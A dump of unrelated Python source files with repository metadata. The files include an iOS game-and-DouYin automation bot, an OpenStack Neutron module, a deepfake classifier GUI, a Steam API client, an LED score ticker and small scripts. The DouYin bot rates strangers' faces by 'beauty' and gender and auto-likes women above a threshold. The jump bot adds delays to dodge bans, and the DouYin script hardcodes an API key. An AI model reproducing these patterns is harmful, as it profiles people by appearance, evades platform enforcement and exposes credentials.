| 38.262295 | 149 | 0.628963 | 266 | 2,334 | 5.353383 | 0.360902 | 0.054073 | 0.031601 | 0.037921 | 0.066011 | 0.066011 | 0.066011 | 0.066011 | 0.066011 | 0 | 0 | 0.003215 | 0.200514 | 2,334 | 60 | 150 | 38.9 | 0.759914 | 0.023136 | 0 | 0.095238 | 0 | 0 | 0.104805 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.214286 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e54ef8675e52df34cced0f2e86826df8b5f7a19 | 11,537 | py | Python | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | 1 | 2018-12-12T04:07:19.000Z | 2018-12-12T04:07:19.000Z | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | null | null | null | DouYin_wechat_jump_auto_iOS.py | JIANSHULI/Douyin_Auto_iOS | b06cd2524e2f0fa304f4cec268f8192dbe3c0c0a | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
# === 思路 ===
# 核心:每次落稳之后截图,根据截图算出棋子的坐标和下一个块顶面的中点坐标,
# 根据两个点的距离乘以一个时间系数获得长按的时间
# 识别棋子:靠棋子的颜色来识别位置,通过截图发现最下面一行大概是一条
直线,就从上往下一行一行遍历,比较颜色(颜色用了一个区间来比较)
找到最下面的那一行的所有点,然后求个中点,求好之后再让 Y 轴坐标
减小棋子底盘的一半高度从而得到中心点的坐标
# 识别棋盘:靠底色和方块的色差来做,从分数之下的位置开始,一行一行扫描,
由于圆形的块最顶上是一条线,方形的上面大概是一个点,所以就
用类似识别棋子的做法多识别了几个点求中点,这时候得到了块中点的 X
轴坐标,这时候假设现在棋子在当前块的中心,根据一个通过截图获取的
固定的角度来推出中点的 Y 坐标
# 最后:根据两点的坐标算距离乘以系数来获取长按时间(似乎可以直接用 X 轴距离)
"""
import os
import shutil
import time
import math
import random
import json
from PIL import Image, ImageDraw
import wda
# import wechat_jump_game.common as common
try:
from wechat_jump_game.common import apiutil
from wechat_jump_game.common.compression import resize_image
print('Load from wechat_jump_game.')
except:
from common import debug, config, screenshot, UnicodeStreamFilter
# from common.auto_adb import auto_adb
from common import apiutil
from common.compression import resize_image
print('Load from Douyin-Bot/')
import sys
################################################
def _random_bias(num):
"""
random bias
:param num:
:return:
"""
print('num = ', num)
return random.randint(-num, num)
def pull_screenshot(Use_App='Wechat_Jump', FACE_PATH = '', id=0):
if 'Wechat_Jump' in Use_App:
c.screenshot('1.png')
elif 'DouYin' in Use_App:
c.screenshot(FACE_PATH + 'autojump.png')
def jump(distance):
press_time = distance * time_coefficient / 1000
print('press time: {}'.format(press_time))
s.tap_hold(random.uniform(0, 320), random.uniform(64, 320), press_time)
def backup_screenshot(ts):
"""
为了方便失败的时候 debug
"""
if not os.path.isdir(screenshot_backup_dir):
os.mkdir(screenshot_backup_dir)
shutil.copy('1.png', '{}{}.png'.format(screenshot_backup_dir, ts))
def save_debug_creenshot(ts, im, piece_x, piece_y, board_x, board_y):
draw = ImageDraw.Draw(im)
# 对debug图片加上详细的注释
draw.line((piece_x, piece_y) + (board_x, board_y), fill=2, width=3)
draw.line((piece_x, 0, piece_x, im.size[1]), fill=(255, 0, 0))
draw.line((0, piece_y, im.size[0], piece_y), fill=(255, 0, 0))
draw.line((board_x, 0, board_x, im.size[1]), fill=(0, 0, 255))
draw.line((0, board_y, im.size[0], board_y), fill=(0, 0, 255))
draw.ellipse(
(piece_x - 10, piece_y - 10, piece_x + 10, piece_y + 10),
fill=(255, 0, 0))
draw.ellipse(
(board_x - 10, board_y - 10, board_x + 10, board_y + 10),
fill=(0, 0, 255))
del draw
im.save('{}{}_d.png'.format(screenshot_backup_dir, ts))
def set_button_position(im):
"""
将swipe设置为 `再来一局` 按钮的位置
"""
global swipe_x1, swipe_y1, swipe_x2, swipe_y2
w, h = im.size
left = w / 2
top = 1003 * (h / 1280.0) + 10
swipe_x1, swipe_y1, swipe_x2, swipe_y2 = left, top, left, top
def find_piece_and_board(im):
w, h = im.size
print("size: {}, {}".format(w, h))
piece_x_sum = piece_x_c = piece_y_max = 0
board_x = board_y = 0
scan_x_border = int(w / 8) # 扫描棋子时的左右边界
scan_start_y = 0 # 扫描的起始 y 坐标
im_pixel = im.load()
# 以 50px 步长,尝试探测 scan_start_y
for i in range(under_game_score_y, h, 50):
last_pixel = im_pixel[0, i]
for j in range(1, w):
pixel = im_pixel[j, i]
# 不是纯色的线,则记录scan_start_y的值,准备跳出循环
if pixel != last_pixel:
scan_start_y = i - 50
break
if scan_start_y:
break
print("scan_start_y: ", scan_start_y)
# 从 scan_start_y 开始往下扫描,棋子应位于屏幕上半部分,这里暂定不超过 2/3
for i in range(scan_start_y, int(h * 2 / 3)):
# 横坐标方面也减少了一部分扫描开销
for j in range(scan_x_border, w - scan_x_border):
pixel = im_pixel[j, i]
# 根据棋子的最低行的颜色判断,找最后一行那些点的平均值,这个颜
# 色这样应该 OK,暂时不提出来
if (50 < pixel[0] < 60) \
and (53 < pixel[1] < 63) \
and (95 < pixel[2] < 110):
piece_x_sum += j
piece_x_c += 1
piece_y_max = max(i, piece_y_max)
if not all((piece_x_sum, piece_x_c)):
return 0, 0, 0, 0
piece_x = piece_x_sum / piece_x_c
piece_y = piece_y_max - piece_base_height_1_2 # 上移棋子底盘高度的一半
for i in range(int(h / 3), int(h * 2 / 3)):
last_pixel = im_pixel[0, i]
if board_x or board_y:
break
board_x_sum = 0
board_x_c = 0
for j in range(w):
pixel = im_pixel[j, i]
# 修掉脑袋比下一个小格子还高的情况的 bug
if abs(j - piece_x) < piece_body_width:
continue
# 修掉圆顶的时候一条线导致的小 bug,这个颜色判断应该 OK,暂时不提出来
if abs(pixel[0] - last_pixel[0]) \
+ abs(pixel[1] - last_pixel[1]) \
+ abs(pixel[2] - last_pixel[2]) > 10:
board_x_sum += j
board_x_c += 1
if board_x_sum:
board_x = board_x_sum / board_x_c
# 按实际的角度来算,找到接近下一个 board 中心的坐标 这里的角度应该
# 是 30°,值应该是 tan 30°, math.sqrt(3) / 3
board_y = piece_y - abs(board_x - piece_x) * math.sqrt(3) / 3
if not all((board_x, board_y)):
return 0, 0, 0, 0
return piece_x, piece_y, board_x, board_y
######### Which App to Use ##########
App_List = ['DouYin', 'Wechat_Jump']
Use_App = 'DouYin'
c = wda.Client(url='http://18.189.58.186:8100')
s = c.session()
if len(sys.argv) == 1:
try:
w = s.window_size()[0]
h = s.window_size()[1]
Follow_Sign_x = w/1080 * 1050
Follow_Sign_y = h/1920 * 920
except:
w = 750 / 2
h = 1334 / 2
Follow_Sign_x = 730 / 2
Follow_Sign_y = 640 / 2
else:
w = int(sys.argv[1])
h = int(sys.argv[2])
Follow_Sign_x = w / 1080 * 990
Follow_Sign_y = h / 1920 * 950
print('Follow_Sign_x: %s; Follow_Sign_y: %s'%(Follow_Sign_x, Follow_Sign_y))
def main():
if 'Wechat_Jump' in Use_App:
####################################################################
######################## Wechat_Jump ###############################
with open('config.json', 'r') as f:
config = json.load(f)
# Magic Number,不设置可能无法正常执行,请根据具体截图从上到下按需设置
under_game_score_y = config['under_game_score_y']
# 长按的时间系数,请自己根据实际情况调节
press_coefficient = config['press_coefficient']
# 二分之一的棋子底座高度,可能要调节
piece_base_height_1_2 = config['piece_base_height_1_2']
# 棋子的宽度,比截图中量到的稍微大一点比较安全,可能要调节
piece_body_width = config['piece_body_width']
time_coefficient = config['press_coefficient']
# 模拟按压的起始点坐标,需要自动重复游戏请设置成“再来一局”的坐标
swipe = config.get('swipe', {
"x1": 320,
"y1": 410,
"x2": 320,
"y2": 410
})
VERSION = "1.1.4"
screenshot_backup_dir = 'screenshot_backups/'
if not os.path.isdir(screenshot_backup_dir):
os.mkdir(screenshot_backup_dir)
while True:
pull_screenshot()
im = Image.open("./1.png")
# 获取棋子和 board 的位置
piece_x, piece_y, board_x, board_y = find_piece_and_board(im)
ts = int(time.time())
print(ts, piece_x, piece_y, board_x, board_y)
if piece_x == 0:
return
set_button_position(im)
distance = math.sqrt(
(board_x - piece_x) ** 2 + (board_y - piece_y) ** 2)
jump(distance)
save_debug_creenshot(ts, im, piece_x, piece_y, board_x, board_y)
backup_screenshot(ts)
# 为了保证截图的时候应落稳了,多延迟一会儿,随机值防 ban
time.sleep(random.uniform(1, 1.1))
elif 'DouYin' in Use_App:
#####################################################################
########################### DouYin ##################################
# 申请地址 http://ai.qq.com
AppID = '1106858595'
AppKey = 'bNUNgOpY6AeeJjFu'
FACE_PATH = 'face/'
Max_Try = 10
Girls = True
Follow_Her = False
Like_Her = True
# 审美标准
BEAUTY_THRESHOLD = 80
Likes_max = 1
Save_Origin = True
Save_Whole = True
Save_Face = True
for i in range(Max_Try):
c = wda.Client(url='http://18.189.58.186:8100') # Please replace this by your own url from WebDriverAgent output.
s = c.session()
# s.swipe_up_pro()
time.sleep(3)
pull_screenshot(Use_App=Use_App, FACE_PATH=FACE_PATH)
if Save_Origin:
im = Image.open(FACE_PATH + 'autojump.png')
im.save(FACE_PATH + 'autojump_%s.png'%(i))
try:
resize_image(FACE_PATH + 'autojump.png', FACE_PATH + 'optimized.png', 1024 * 1024)
with open(FACE_PATH + 'optimized.png', 'rb') as bin_data:
image_data = bin_data.read()
except:
with open(FACE_PATH + 'autojump.png', 'rb') as bin_data:
image_data = bin_data.read()
ai_obj = apiutil.AiPlat(AppID, AppKey)
rsp = ai_obj.face_detectface(image_data, 0)
if rsp['ret'] == 0:
beauty = 0
for face in rsp['data']['face_list']:
print(face)
face_area = (face['x'], face['y'], face['x'] + face['width'], face['y'] + face['height'])
print(face_area)
img = Image.open(FACE_PATH + "optimized.png")
if Save_Whole:
img.save(FACE_PATH + face['face_id'] + '_Whole.png')
if Save_Face:
cropped_img = img.crop(face_area).convert('RGB')
cropped_img.save(FACE_PATH + face['face_id'] + '.png')
# 性别判断
if Girls:
if face['beauty'] > beauty and face['gender'] < 50:
beauty = face['beauty']
else:
if face['beauty'] > beauty and face['gender'] > 50:
beauty = face['beauty']
# 是个美人儿~关注点赞走一波
if beauty > BEAUTY_THRESHOLD:
print('发现漂亮妹子!!!')
print('颜值: %s' %beauty)
if Like_Her:
for i in range(int((beauty - BEAUTY_THRESHOLD)/((100 - BEAUTY_THRESHOLD)/Likes_max) + 1)):
s.double_tap(x=w/2, y=h/2)
print('Heart!')
# time.sleep(0.11)
if Follow_Her:
s.tap(x=Follow_Sign_x, y=Follow_Sign_y)
print('Follow!')
# time.sleep(0.2)
time.sleep(3)
else:
print('颜值: %s' % beauty)
try:
s.swipe_up_pro()
except:
time.sleep(10)
c = wda.Client(url='http://18.189.58.186:8100')
s = c.session()
try:
s.swipe_up_pro()
except:
pass
time.sleep(1)
if __name__ == '__main__':
main()
| 32.407303 | 125 | 0.515299 | 1,447 | 11,537 | 3.87906 | 0.228749 | 0.024586 | 0.017638 | 0.017103 | 0.29307 | 0.206129 | 0.159808 | 0.139141 | 0.087476 | 0.087476 | 0 | 0.043663 | 0.346884 | 11,537 | 355 | 126 | 32.498592 | 0.700995 | 0.120569 | 0 | 0.216102 | 0 | 0 | 0.074276 | 0.002157 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033898 | false | 0.004237 | 0.059322 | 0 | 0.114407 | 0.063559 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e553930e52041c6112f0876fab58cc7d814a1bf | 1,165 | py | Python | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 3 | 2017-06-30T18:09:44.000Z | 2017-11-04T18:24:39.000Z | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 10 | 2017-02-25T21:39:01.000Z | 2018-09-19T07:53:46.000Z | _modules/neutronv2/subnetpools.py | NDPF/salt-formula-neutron | 758f3350fa541a41174105c92c0b9cceb6951d81 | [
"Apache-2.0"
] | 21 | 2017-02-01T18:12:51.000Z | 2019-04-29T09:29:01.000Z | from neutronv2.common import send
from neutronv2.arg_converter import get_by_name_or_uuid_multiple
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('get')
def subnetpool_get_details(subnetpool_id, **kwargs):
url = '/subnetpools/{}?{}'.format(
subnetpool_id, urlencode(kwargs)
)
return url, {}
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('put')
def subnetpool_update(subnetpool_id, **kwargs):
url = '/subnetpools/{}'.format(subnetpool_id)
json = {
'subnetpool': kwargs,
}
return url, {'json': json}
@get_by_name_or_uuid_multiple([('subnetpool', 'subnetpool_id')])
@send('delete')
def subnetpool_delete(subnetpool_id, **kwargs):
url = '/subnetpools/{}'.format(subnetpool_id)
return url, {}
@send('post')
def subnetpool_create(name, prefixes, **kwargs):
url = '/subnetpools'
json = {
'subnetpool': {
'name': name,
'prefixes': prefixes,
}
}
json['subnetpool'].update(kwargs)
return url, {'json': json}
| 24.787234 | 64 | 0.663519 | 132 | 1,165 | 5.590909 | 0.265152 | 0.146341 | 0.04878 | 0.059621 | 0.495935 | 0.433604 | 0.402439 | 0.402439 | 0.199187 | 0.199187 | 0 | 0.002112 | 0.187124 | 1,165 | 46 | 65 | 25.326087 | 0.777191 | 0 | 0 | 0.297297 | 0 | 0 | 0.167382 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108108 | false | 0 | 0.135135 | 0 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e564de62423749988de8758a4e46d97633e7c42 | 4,084 | py | Python | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | 1 | 2021-08-02T00:41:20.000Z | 2021-08-02T00:41:20.000Z | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | null | null | null | deepfakes-clasificador.py | sramirezaraya/deepfakes-detection | ed18b807958649027d224df077778a48d3e1655c | [
"Apache-2.0"
] | null | null | null | import tkinter
from tkinter import *
from PIL import Image, ImageTk
from tkinter.filedialog import askopenfilename
import cv2
from keras.models import load_model
import numpy as np
import keras
import tensorflow
import os
from mtcnn import MTCNN
ventana = tkinter.Tk()
ventana.geometry("768x687")
ventana.configure(bg="white")
ventana.title("Sistema Clasificador de Deepfakes")
print(keras.__version__)
print(tensorflow.__version__)
path = "./modelos/"
name_model = "VGG16.h5"
model = load_model(os.path.join(path,name_model))
detector = MTCNN()
# funcion crop
def crop(box,image):
x0 = box[0]
y0 = box[1]
w= box[2]
h= box[3]
if x0<0:
x0=0
if y0<0:
y0=0
if type(image) is np.ndarray:
if image.size==0:
pass
if image is None:
pass
image = cv2.resize(image[y0:y0+h , x0:x0+w],(224,224))
return image
def prediccion(filename):
m_pred = []
count = 0
cap = cv2.VideoCapture(filename)
while cap.isOpened():
success, image = cap.read()
if success:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
face_locations = detector.detect_faces(image)
if len(face_locations) > 0:
for person in face_locations:
if person['confidence'] > 0.95:
i = 0
bounding_box = person['box']
keypoints = person['keypoints']
confidence = person['confidence']
image = np.expand_dims(crop(bounding_box, image), axis=0)
PRED = model.predict(image)[0][0]
m_pred.append(PRED)
i += 1
count += 150
#count += int(cap.get(cv2.CAP_PROP_FRAME_COUNT) / 20)
cap.set(1, count)
else:
cap.release()
break
return video2(filename, np.mean(m_pred))
# esta funcion no crea un nuevo video, sino que solo muestra la prediccion en el video entregado.
def video2(filename, pred):
cap = cv2.VideoCapture(filename)
if (cap.isOpened()== False):
print("Error al abrir el video")
while(cap.isOpened()):
success, image = cap.read()
if success == True:
face_locations = detector.detect_faces(image)
if len(face_locations) > 0:
for person in face_locations:
if person['confidence']>0.95:
bounding_box = person['box']
if pred>=0.5:
cv2.rectangle(image,
(bounding_box[0], bounding_box[1]),
(bounding_box[0]+bounding_box[2], bounding_box[1] + bounding_box[3]),
(0,0,255),
2)
text = "FAKE" + " - " + str(pred)
cv2.putText(image,str(text),(bounding_box[0],bounding_box[1]-5),cv2.FONT_HERSHEY_SIMPLEX,1,(0,0,255),2,cv2.LINE_AA)
else:
cv2.rectangle(image,
(bounding_box[0], bounding_box[1]),
(bounding_box[0]+bounding_box[2], bounding_box[1] + bounding_box[3]),
(0,255,0),
2)
text = "REAL" + " - " + str(pred)
cv2.putText(image,str(text),(bounding_box[0],bounding_box[1]-5),cv2.FONT_HERSHEY_SIMPLEX,1,(0,255,0),2,cv2.LINE_AA)
cv2.imshow('Prediccion Video', image)
key = cv2.waitKey(1)
if key & 0xFF == ord('q'):
break
else:
break
def cargar_archivo():
filename = askopenfilename()
prediccion(filename)
img3 = Image.open("facial.png")
render2 = ImageTk.PhotoImage(img3)
img_3 = Label(ventana, image=render2, bd=0)
img_3.place(x=0,y=0)
img2 = PhotoImage(file="button.png")
b1 = Button(ventana, image= img2, bd=0, command=cargar_archivo)
b1.place(x=260,y=640)
ventana.mainloop()
| 32.15748 | 140 | 0.540157 | 495 | 4,084 | 4.341414 | 0.335354 | 0.097255 | 0.039088 | 0.05584 | 0.290368 | 0.290368 | 0.290368 | 0.290368 | 0.290368 | 0.249418 | 0 | 0.052906 | 0.342801 | 4,084 | 126 | 141 | 32.412698 | 0.747765 | 0.039177 | 0 | 0.277778 | 0 | 0 | 0.04797 | 0 | 0.018519 | 0 | 0.001054 | 0 | 0 | 1 | 0.037037 | false | 0.018519 | 0.101852 | 0 | 0.157407 | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e581386b587edbff364859416ea64e6cd9f12b6 | 399 | py | Python | crawlers/base.py | Saphyel/steamhelp | 50ea7071fe43dc59f53b05d9e255ffe44c789f6c | [
"MIT"
] | null | null | null | crawlers/base.py | Saphyel/steamhelp | 50ea7071fe43dc59f53b05d9e255ffe44c789f6c | [
"MIT"
] | 1 | 2021-06-02T02:56:36.000Z | 2021-06-02T02:56:36.000Z | crawlers/base.py | Saphyel/masterofgames | 486fc330778b7f5d8150b5ba47fc6662bcb2ff06 | [
"MIT"
] | null | null | null | __strict__ = True
import httpx
from core.config import Config
async def client_fetch(endpoint: str, payload: dict = None) -> dict:
payload.update({"key": Config.STEAM_API_KEY})
async with httpx.AsyncClient() as client:
result = await client.get("https://api.steampowered.com" + endpoint, params=payload, timeout=10)
result.raise_for_status()
return result.json()
| 28.5 | 104 | 0.701754 | 52 | 399 | 5.211538 | 0.711538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006135 | 0.182957 | 399 | 13 | 105 | 30.692308 | 0.825153 | 0 | 0 | 0 | 0 | 0 | 0.077694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5ab61913224cc7ea06a3d96f8c73df05bb03c2 | 1,925 | py | Python | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | pythonaulas/Aula 15/Desafio 069.py | jrwarg/Estudos-Phyton | 2207ec1ee9880501e12fbfecf7dfaaf38bb2ebca | [
"MIT"
] | null | null | null | """
DESAFIO 069: Análise de Dados do Grupo
Crie um programa que leia a idade e o sexo de várias pessoas. A cada pessoa cadastrada,
o programa deverá perguntar se o usuário quer ou não continuar. No final, mostre:
A) Quantas pessoas têm mais de 18 anos.
B) Quantos homens foram cadastrados.
C) Quantas mulheres têm menos de 20 anos.
"""
sep = '-' * 50
maioresde18 = 0
homens = 0
mulheresmenos20 = 0
contador = 0
while True:
print(sep)
titulo = f'PESSOA Nº {contador + 1}'
print(f'{titulo:^50}')
print(sep)
idade = int(input(f'Idade: '))
sexo = 'I'
while sexo != 'M' and sexo != 'F':
sexo = str(input(f'Sexo [M/F]: '))
sexo = sexo.strip().upper()[0].replace(' ', '')
if idade > 18:
maioresde18 += 1
if sexo == 'M':
homens += 1
if sexo == 'F' and idade < 20:
mulheresmenos20 += 1
contador += 1
continuar = 'I'
print(sep)
while continuar != 'S' and continuar != 'N':
continuar = str(input('Quer cadastrar outra pessoa [S/N]? '))
continuar = continuar.strip().upper()[0].replace(' ', '')
print(sep)
print('')
if continuar == 'N':
break
if contador == 1:
print('Você cadastrou somente 1 pessoa. Deste número,', end=' ')
else:
print(f'Você cadastrou {contador} pessoas no total. Deste número,', end=' ')
if maioresde18 == 0:
print('nenhuma tem mais de 18 anos,', end=' ')
elif maioresde18 == 1:
print('1 tem mais de 18 anos,', end=' ')
else:
print(f'{maioresde18} têm mais de 18 anos,', end=' ')
if homens == 0:
print('nenhum é homem,', end=' ')
elif homens == 1:
print('1 é homem,', end=' ')
else:
print(f'{homens} são homens,', end=' ')
if mulheresmenos20 == 0:
print('e nenhuma mulher tem menos de 20 anos.')
elif mulheresmenos20 == 1:
print('e 1 mulher tem menos de 20 anos.')
else:
print(f'e {mulheresmenos20} mulheres têm menos de 20 anos.')
| 27.5 | 87 | 0.603636 | 277 | 1,925 | 4.194946 | 0.32491 | 0.025818 | 0.027539 | 0.041308 | 0.138554 | 0.110155 | 0 | 0 | 0 | 0 | 0 | 0.047521 | 0.245714 | 1,925 | 69 | 88 | 27.898551 | 0.752755 | 0.170909 | 0 | 0.150943 | 0 | 0 | 0.290932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.320755 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5babce487a774c4669c2b615801033f39b7cba | 1,941 | py | Python | ticker/scores_ticker.py | dspec12/LED-Sports-Score-Ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | 1 | 2020-09-17T14:37:47.000Z | 2020-09-17T14:37:47.000Z | ticker/scores_ticker.py | dspec12/LED-Sports-Score-Ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | 1 | 2020-12-22T01:59:55.000Z | 2020-12-22T01:59:55.000Z | ticker/scores_ticker.py | dspec12/led-sports-score-ticker | 41cd2fcb5eebf6a43151f5f06067b44c60462508 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import sys
import os
import time
import requests
from rgbmatrix import RGBMatrix, RGBMatrixOptions, graphics
# Configuration for the matrix
options = RGBMatrixOptions()
options.scan_mode = 0
options.pwm_lsb_nanoseconds = 130
options.pwm_bits = 11
options.show_refresh_rate = 0
options.gpio_slowdown = 2
options.rows = 16
options.chain_length = 4
options.parallel = 1
options.hardware_mapping = "adafruit-hat-pwm"
options.drop_privileges=False
font_filename = "9x15B.bdf"
text_color = 4, 106, 56
ticker_speed = 0.03
def grab_scores():
url = "https://led-sports-score-ticker.s3.amazonaws.com/scores.txt"
try:
scores = requests.get(url)
return scores.text
except requests.exceptions.ConnectionError as e:
print("Could not connect to endpoint:")
print(e)
except requests.exceptions.HTTPError as e:
print("Http error:")
print(e)
except Exception as e:
print("Unknown error:")
print(type(e))
print(e)
def led_scroll_text():
matrix = RGBMatrix(options=options)
offscreen_canvas = matrix.CreateFrameCanvas()
cwd = os.path.dirname(__file__)
font_path = os.path.join(cwd, font_filename)
font = graphics.Font()
font.LoadFont(font_path)
textColor = graphics.Color(*text_color)
pos = offscreen_canvas.width
scroll_text = grab_scores()
count = 0
while True:
offscreen_canvas.Clear()
len = graphics.DrawText(offscreen_canvas, font, pos, 13, textColor, scroll_text)
pos -= 1
if pos + len < 0:
pos = offscreen_canvas.width
count += 1
if count >= 1:
count = 0
print("Refreshing scores...")
scroll_text = grab_scores()
time.sleep(ticker_speed)
offscreen_canvas = matrix.SwapOnVSync(offscreen_canvas)
if __name__ == "__main__":
print("Starting...")
led_scroll_text()
| 25.88 | 88 | 0.667697 | 243 | 1,941 | 5.139918 | 0.481481 | 0.084067 | 0.019215 | 0.036829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022788 | 0.231324 | 1,941 | 74 | 89 | 26.22973 | 0.814343 | 0.02576 | 0 | 0.147541 | 0 | 0 | 0.09423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0 | 0.081967 | 0 | 0.131148 | 0.147541 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e5bd1f2581c4fc1b5ee0568b2671c3f8232e0f1 | 2,332 | py | Python | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | post.py | DMistry13/IPT-Sparkler | e1d4411866f736190362c63170bdfbebf0c0f730 | [
"CC0-1.0"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def graphs(file,fps,sc,ff,d,center):
df = pd.read_csv(file, index_col=False)
df = pd.DataFrame(df, columns= ['cx','cy','n','v'])
nn = []
mnvl = []
sdd = []
#to get number of repeats
for i in range(int(min(df["n"])),int(max(df["n"]))):
c = df.loc[df['n'] == i]
num = len(c["cx"])
mnval = np.mean(c["cx"])
nn.append(num)
mnvl.append(mnval)
fig1, ax1 = plt.subplots()
fig2, ax2 = plt.subplots()
fig3, ax3 = plt.subplots()
fig4, ax4 = plt.subplots()
fig5, ax5 = plt.subplots()
fig6, ax6 = plt.subplots()
v = df["v"] #v
cx = df["cx"] #cx
n = df["n"] #frames
t = n/fps
x = cx
v = v*sc
ax1.plot(t,np.abs(np.array(x)-center)*sc,"rx")
ax2.plot(t,v,"rx")
ax4.plot(np.abs(np.array(x)-center)*sc,v,"rx")
ax3.plot(np.linspace(1,len(nn),len(nn)),nn,"rx")
ax5.plot(np.linspace(1,len(mnvl),len(mnvl)),(np.array(mnvl) - center)*sc,"b--")
ax6.hist(np.abs((x-center)*sc),bins=100)
print(d+"\\Making XDT for " +str(ff))
ax1.set_ylabel("x-distance (cm)")
ax1.set_xlabel("Time (s)")
ax1.set_title("Graph of x-distance against Time of recording " + str(ff))
ax1.grid()
fig1.savefig(d+'\\XDT'+str(ff)+'.png')
print("XDT done, making VT for " +str(ff))
ax2.set_ylabel("Speed (cm per sec)")
ax2.set_xlabel("Time (s)")
ax2.set_title("Graph of speed against Time of recording " + str(ff))
ax2.grid()
fig2.savefig(d+'\\VT'+str(ff)+'.png')
print("VT done, making MPPFT for " +str(ff))
ax3.set_ylabel("Number of particles per frame")
ax3.set_xlabel("Time (s)")
ax3.set_title("Number of particles per frame against Time of recording " + str(ff))
ax3.grid()
fig3.savefig(d+'\\NPPFT'+str(ff)+'.png')
print("NPPFT done, making VX for " +str(ff))
ax4.set_ylabel("Speed (cm per sec)")
ax4.set_xlabel("x-distance (cm)")
ax4.set_title("Speed against x-distance of recording " + str(ff))
ax4.grid()
fig4.savefig(d+'\\VX'+str(ff)+'.png')
fig5.savefig(d+'\\MN'+str(ff)+'.png')
fig6.savefig(d+'\\hist'+str(ff)+'.png')
print("VX done for " +str(ff))
